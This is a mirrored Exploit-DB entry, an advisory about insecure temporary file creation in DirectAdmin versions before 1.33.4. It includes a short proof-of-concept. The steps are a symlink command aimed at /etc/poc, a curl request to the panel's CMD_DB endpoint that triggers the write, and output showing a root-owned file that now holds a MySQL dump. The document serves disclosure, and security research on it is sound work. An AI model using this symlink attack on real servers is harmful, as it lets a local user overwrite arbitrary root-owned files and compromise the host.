exploit-db-mirror/exploits/linux/local/32947.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
635 B
Text

source: https://www.securityfocus.com/bid/34676/info
DirectAdmin creates temporary files in an insecure manner.
An attacker with local access could potentially exploit this issue to perform symbolic link attacks to overwrite arbitrary attacker-specified files. This could facilitate a complete compromise of the affected computer.
Versions prior to DirectAdmin 1.33.4 are vulnerable.
On server: $ ln -s /etc/poc /home/tmp/database_name.gz
On client: $ curl http://www.example.com:2222/CMD_DB/database_name.gz
On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9